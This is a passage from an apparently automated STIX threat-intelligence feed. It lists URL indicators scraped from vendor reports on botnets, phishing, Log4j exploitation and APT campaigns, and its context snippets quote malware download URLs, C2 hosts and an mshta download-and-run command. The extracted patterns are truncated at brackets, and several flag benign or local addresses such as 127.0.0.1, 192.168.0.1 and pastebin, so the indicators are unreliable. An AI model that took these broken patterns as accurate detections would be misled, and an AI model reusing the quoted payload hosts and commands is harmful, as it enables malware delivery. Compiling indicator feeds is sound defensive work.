Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/03/ascii-smuggling-crosses-over-from-ai-prompt-injection-to-phishing-evasion/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--baba537a-a044-48a3-bdf7-98d23052eefc","created":"2026-09-03T16:00:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://＜brand-subdomain＞.activehosted[","description":"Seen in \"ASCII smuggling crosses over from AI prompt injection to phishing evasion\" (Microsoft Security Blog). Context: k like: hxxps://＜account-id＞.acemlnd[.]com/＜tracking-token＞ hxxps://＜brand-subdomain＞.activehosted[.]com/＜tracking-token＞ Most of the flagged messages carried","pattern":"[url:value = 'https://＜brand-subdomain＞.activehosted[']","pattern_type":"stix","valid_from":"2026-09-03T16:00:00.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/03/ascii-smuggling-crosses-over-from-ai-prompt-injection-to-phishing-evasion/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f310126-cd92-426d-987b-9151d50b6a5e","created":"2026-09-03T10:00:58.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://167.148.195[","description":"Seen in \"Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America\" (Palo Alto Unit 42). Context: a2cf34f0af1afe161f123a3d200e77f6c6f41b81bf6ae66ee172ec URL: hxxp[:]//167.148.195[.]53:8888/socktz_v9.exe Additional Resources Operation Esc","pattern":"[url:value = 'http://167.148.195[']","pattern_type":"stix","valid_from":"2026-09-03T10:00:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d0ae480-aefd-4ad7-afd7-bea1d5bbe840","created":"2026-09-01T22:48:28.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://www.gehie246[","description":"Seen in \"Counterfeit installers to system compromise: Tracking a deceptive software download campaign\" (Microsoft Security Blog). Context: e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[","pattern":"[url:value = 'http://www.gehie246[']","pattern_type":"stix","valid_from":"2026-09-01T22:48:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/01/counterfeit-installers-system-compromise-tracking-deceptive-software-download-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62b1055b-5326-47e7-bd50-4ac5fec5df2f","created":"2026-09-01T21:30:18.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[","description":"Seen in \"Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)\" (SANS Internet Storm Center). Context: 684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortc","pattern":"[url:value = 'https://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[']","pattern_type":"stix","valid_from":"2026-09-01T21:30:18.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33300"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4c0ba88c-7f66-4a47-ad7c-b1db68542cfc","created":"2026-08-28T11:26:52.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://webhook[","description":"Seen in \"Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations\" (Security Affairs). Context: o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg.","pattern":"[url:value = 'http://webhook[']","pattern_type":"stix","valid_from":"2026-08-28T11:26:52.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/197996/apt/russian-apt-bluedelta-uses-hookedge-to-target-defense-and-diplomatic-organizations.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9dac740-10d6-402e-b207-11386f0841b7","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://159.89.156[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89.","pattern":"[url:value = 'http://159.89.156[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4368c14-75cf-4e4c-9953-c55a1ee90cc6","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://165.227.78[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, the","pattern":"[url:value = 'http://165.227.78[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f69fb3b4-828d-43d3-a77b-4b2a78a4a43e","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://y.fd6fq54s6df541q23sdxfg[","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: .233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.","pattern":"[url:value = 'http://y.fd6fq54s6df541q23sdxfg[']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7d13a8e-6b6e-469e-b32b-e3e6bf805853","created":"2026-08-19T12:03:53.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://192.168.0[","description":"Seen in \"A Deep Dive Into Attempted Exploitation of CVE-2023\" (Palo Alto Unit 42). Context: ted a session token that is reflected in the following URL: hxxp[:]//192.168.0[.]1/WCYCPJQAHXBRCQSC/userRpm/Index.htm As the session toke","pattern":"[url:value = 'http://192.168.0[']","pattern_type":"stix","valid_from":"2026-08-19T12:03:53.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/exploitation-of-cve-2023-33538/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ed849f7-4da1-405d-8a49-0dffde8e19f5","created":"2026-08-19T12:03:38.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://127.0.0[","description":"Seen in \"TuxBot v3: Inside an IoT Botnet Framework With LLM\" (Palo Alto Unit 42). Context: CHANNEL #tuxbot TABLE_IRC_NICK_PREFIX tux TABLE_HTTP_C2_URL hxxp[:]//127.0.0[.]1/cmd TABLE_THINKPHP_PAYLOAD Full HTTP GET request (312","pattern":"[url:value = 'http://127.0.0[']","pattern_type":"stix","valid_from":"2026-08-19T12:03:38.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/tuxbot-v3-evolution-iot-botnet/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--327025ad-331e-4acb-bfc3-ca8641199d8d","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://feed43[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: rvers 185.203.118[.]115 94.156.35[.]204 Dead Drop Resolvers hxxp://feed43[.]com/8166706728852850.xml hxxp://feed43[.]com/3210021137734","pattern":"[url:value = 'http://feed43[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df9737e9-4cc5-4f33-a3dc-744e93edd18d","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://feeds.rapidfeeds[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: 622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]com/88604/ Script to Decrypt Dead Drop Resolvers 1 2 3 4 5","pattern":"[url:value = 'http://feeds.rapidfeeds[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--095b1653-93e9-40ee-b252-a2e3355802b8","created":"2026-08-17T13:24:45.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://www.webrss[","description":"Seen in \"Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent\" (Palo Alto Unit 42). Context: 66706728852850.xml hxxp://feed43[.]com/3210021137734622.xml hxxp://www.webrss[.]com/createfeed.php?feedid=49966 hxxp://feeds.rapidfeeds[.]","pattern":"[url:value = 'http://www.webrss[']","pattern_type":"stix","valid_from":"2026-08-17T13:24:45.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02f9716f-cfe1-43ab-96df-c2902c39c2ab","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://bjm9.blogspot[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: WildFire's analysis, the shortened bit.ly URL redirected to hxxps://bjm9.blogspot[.]com/p/si.html , as seen in the “Location” field of the HTT","pattern":"[url:value = 'https://bjm9.blogspot[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6d3113e0-d589-41a7-b74b-e28a12d5e14f","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://pastebin[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: n to download a script from a Pastebin URL, specifically at hxxps://pastebin[.]com/raw/tb5gHu2G that we will continue to refer to as the","pattern":"[url:value = 'https://pastebin[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--015d292b-4529-484a-8afa-a8a64788604d","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://static.wixstatic[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: t’s footer that attempts to load a remote OLE document from hxxps://static.wixstatic[.]com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc : Figu","pattern":"[url:value = 'https://static.wixstatic[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75280524-3326-4f0b-936f-e2623f862680","created":"2026-08-17T13:21:46.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://www.bitly[","description":"Seen in \"Aggah Campaign: Bit.ly, BlogSpot, and Pastebin Used for C2 in Large Scale Campaign\" (Palo Alto Unit 42). Context: nd execute the following URL via the \"Shell\" command: mshta hxxp://www.bitly[.]com/SmexEaldos3 The command above uses the built-in “mshta","pattern":"[url:value = 'http://www.bitly[']","pattern_type":"stix","valid_from":"2026-08-17T13:21:46.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be6ec218-ef5d-4dee-a16e-ed2d4b9859fa","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://163.123.143[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: and executed, to accommodate different Linux architectures: hxxp://163.123.143[.]126/bins/dark.x86 hxxp://163.123.143[.]126/bins/dark.mips","pattern":"[url:value = 'http://163.123.143[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ee94b8ab-81f9-4d4c-a09b-6c472710a8d7","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://212.192.241[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: ng more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a diagram illustrating the campaig","pattern":"[url:value = 'http://212.192.241[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--134a3b8e-a72b-42ea-8520-f6dfc9b65566","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://2.56.59[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: s and found two URLs hosting more shell script downloaders: hxxp://2.56.59[.]215/i.sh hxxp://212.192.241[.]72/lolol.sh Figure 2 is a di","pattern":"[url:value = 'http://2.56.59[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7fdff524-5ff3-45f9-9d60-0433dae11f66","created":"2026-08-17T13:04:23.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://31.210.20[","description":"Seen in \"Old Wine in the New Bottle: Mirai Variant Targets Multiple IoT Devices\" (Palo Alto Unit 42). Context: URLs in the malware samples that hosted two shell scripts: hxxp://31.210.20[.]100/lolol[.]sh hxxp://212.192.241[.]72/lolol[.]sh The shel","pattern":"[url:value = 'http://31.210.20[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:23.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-iz1h9/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e06f28b-abe7-4dca-a248-299b0c8d276b","created":"2026-08-17T13:04:05.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://185.225.74[","description":"Seen in \"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits\" (Palo Alto Unit 42). Context: g bot clients to accommodate different Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.7","pattern":"[url:value = 'http://185.225.74[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3cb4a66b-558a-4239-92f3-688018155b5a","created":"2026-08-17T13:04:05.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://zvub[","description":"Seen in \"IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits\" (Palo Alto Unit 42). Context: o download a shell script downloader as a file named y from hxxp://zvub[.]us/ . If executed, the shell script downloader would downl","pattern":"[url:value = 'http://zvub[']","pattern_type":"stix","valid_from":"2026-08-17T13:04:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c39f493-716c-4a53-b917-37150884b53f","created":"2026-08-17T12:55:06.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://games.my-homeip[","description":"Seen in \"Bisonal Malware Used in Attacks Against Russia and South Korea\" (Palo Alto Unit 42). Context: the RC4 cipher with the same key “78563412”. It connects to hxxp://games.my-homeip[.]com:443/ks8d[ip address]akspbu.txt by using the HTTP POST","pattern":"[url:value = 'http://games.my-homeip[']","pattern_type":"stix","valid_from":"2026-08-17T12:55:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9ea7b29f-c5ce-4a94-8ed9-b493b64178ad","created":"2026-08-17T12:45:38.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://178.16.54[","description":"Seen in \"Almost Half of Malware Samples Communicate Direct to IP\" (Palo Alto Unit 42). Context: th several malware samples (e.g., the binary retrieved from hxxp[:]//178.16.54[.]109/st.exe ) associated with Phorpiex (aka Trik), a long","pattern":"[url:value = 'http://178.16.54[']","pattern_type":"stix","valid_from":"2026-08-17T12:45:38.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/malware-bypass-dns-direct-to-ip/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2a2c89f6-2c40-4978-a54c-75d27abca93b","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://139.155.2[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: ava class file from a remote server. The EvilObj.class from hxxp://139.155.2[.]105:8081 contains the decompiled Java code as seen in Figu","pattern":"[url:value = 'http://139.155.2[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e3865c3-2df6-413e-a5c6-4c11ef64bb90","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://150.60.139[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: s and execute them. The first file downloaded was hosted at hxxp://150.60.139[.]51:80/wp-content/themes/twentyseventeen/s.cmd , which cont","pattern":"[url:value = 'http://150.60.139[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d151e7d-7bc7-4e53-a840-38281acbf289","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://161.35.184[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: e above, the server would download a Java class file from a hxxp://161.35.184[.]54:9998/V8.class URL, which responds with a Java class fil","pattern":"[url:value = 'http://161.35.184[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--674a9c98-08c0-4f19-be88-5ed6b52bdaea","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://165.22.2[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: that provides the Java class that installs a coinminer. The hxxp://165.22.2[.]186:80/wp-content/themes/twentyseventeen/Exploit.class res","pattern":"[url:value = 'http://165.22.2[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3dd7e1f0-df7f-4a91-84cd-e98eb052d587","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://2.57.121[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: cessing this URL, the server would access a Java class from hxxp://2.57.121[.]36/Rjava.class , which contained the decompiled code seen","pattern":"[url:value = 'http://2.57.121[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0acee2bb-a934-460a-8e13-0712f4a479c0","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://68.183.165[","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: ommand attempts to download and execute an application from hxxp://68.183.165[.]105:80/wp-content/themes/twentyseventeen/xmrig64.exe , whi","pattern":"[url:value = 'http://68.183.165[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f299303f-8872-4f56-b593-104367e25755","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: http://[hostname","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: The HTTP POST requests would be sent to the following URLs: hxxp://[hostname].[username]8.pef.mur.1ma[.]xyz/ hxxp://[hostname].[username","pattern":"[url:value = 'http://[hostname']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--da69ac88-edd3-4150-842b-5d85c3c51e9e","created":"2026-08-17T12:20:33.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://[hostname","description":"Seen in \"Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021\" (Palo Alto Unit 42). Context: [.]xyz/ hxxp://[hostname].[username]5.pef.mur.1ma[.]xyz:53/ hxxps://[hostname].[username]4.pef.mur.1ma[.]xyz/ The DNS tunneling involves","pattern":"[url:value = 'https://[hostname']","pattern_type":"stix","valid_from":"2026-08-17T12:20:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a0ad0e60-2657-4531-aa51-477b53297227","created":"2026-08-17T12:20:00.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://cdn.discordapp[","description":"Seen in \"Threat Brief: Ongoing Russia and Ukraine Cyber Activity\" (Palo Alto Unit 42). Context: cious. The hosted file is retrieved from the following URL: hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbop","pattern":"[url:value = 'https://cdn.discordapp[']","pattern_type":"stix","valid_from":"2026-08-17T12:20:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31772383-2cc2-4038-9dae-f649cc2143ba","created":"2026-08-17T12:18:51.000Z","modified":"2026-09-16T08:59:08.409Z","created_by_ref":"identity--cf8d0902-d079-4700-a8ac-22cb74b52e56","name":"url: https://akamaitechcloudservices[","description":"Seen in \"Threat Brief: 